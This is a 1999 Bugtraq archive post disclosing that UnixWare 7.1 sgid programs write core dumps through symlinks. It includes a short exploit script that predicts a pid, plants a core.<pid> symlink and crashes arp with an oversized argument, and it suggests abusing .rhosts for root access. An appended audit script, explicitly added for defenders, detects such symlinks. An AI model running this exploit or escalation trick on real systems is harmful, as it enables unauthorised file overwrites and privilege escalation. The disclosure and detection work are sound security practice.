Bugtraq mailing list archives
UnixWare coredumps follow symlinks
From: btellier () USA NET (Brock Tellier)
Date: Thu, 2 Dec 1999 19:07:20 MST
Greetings,

OVERVIEW

Any user may cause system files to be overwritten with coredump data. A full root compromise may be possible.

BACKGROUND

All my testing was done on UnixWare 7.1 though I would imagine 7.x is vulnerable as well.

DETAILS

UnixWare's sgid binaries are allowed to dump core (but suids are not). By "calculating" the pid of the sgid binary we will call, we can create a symlink from ./core.pid to any file which would be writable by the running group. Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able to play around with. My arp exploit attached below demonstrates how one would overwrite a file using this vulnerability.

Why is a root compromise possible? Well, assuming that we could somehow get "+ +" on a line by itself in the corefile, we could place this into the .rhosts file of some group writable directory/.rhosts. Gaining the additional privileges of any system account is usually a fast ticket to root.

EXPLOIT

#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier () usa net
####

pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
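The attack described in the post leaves a recognisable artifact on disk: a symlink named core or core.<pid> in a directory where the sgid program will be run, pointing at a group-writable file. The audit helper below is an added example for defenders and is not part of Tellier's post; it is a constructed POSIX sh script that scans one directory for such symlinks and flags targets whose group write bit is set (the directory path and file names are whatever the caller supplies).

```shell
#!/bin/sh
# Constructed audit helper (added example, not from the original post).
# Scans DIR for symlinks named "core" or "core.<digits>", the setup a
# coredump-follows-symlink attack needs, and prints one line per finding:
#   <link> -> <target> [group-writable]
# The "[group-writable]" tag marks targets an sgid coredump could clobber.
audit_core_symlinks() {
    dir=$1
    for link in "$dir"/core "$dir"/core.*; do
        [ -L "$link" ] || continue         # real core files are not the issue
        name=${link##*/}
        suffix=${name#core}
        case "$suffix" in
            '') ;;                         # plain "core"
            .*) case "${suffix#.}" in      # "core.<pid>": digits only
                    ''|*[!0-9]*) continue ;;
                esac ;;
            *) continue ;;
        esac
        target=$(readlink "$link")
        # resolve relative link targets against the scanned directory
        case "$target" in
            /*) abs=$target ;;
            *)  abs=$dir/$target ;;
        esac
        tag=''
        # -prune stops find descending; -perm -g=w tests the group write bit
        if [ -e "$abs" ] && [ -n "$(find "$abs" -prune -perm -g=w -print 2>/dev/null)" ]; then
            tag=' [group-writable]'
        fi
        printf '%s -> %s%s\n' "$link" "$target" "$tag"
    done
}

# count_core_symlinks DIR: number of suspicious core symlinks found in DIR
count_core_symlinks() {
    audit_core_symlinks "$1" | wc -l | tr -d ' '
}
```

Run it over the working directories of sgid programs (and any world-writable directory) on a schedule; a dangling core.<pid> symlink is worth investigating even when its target is not currently group-writable.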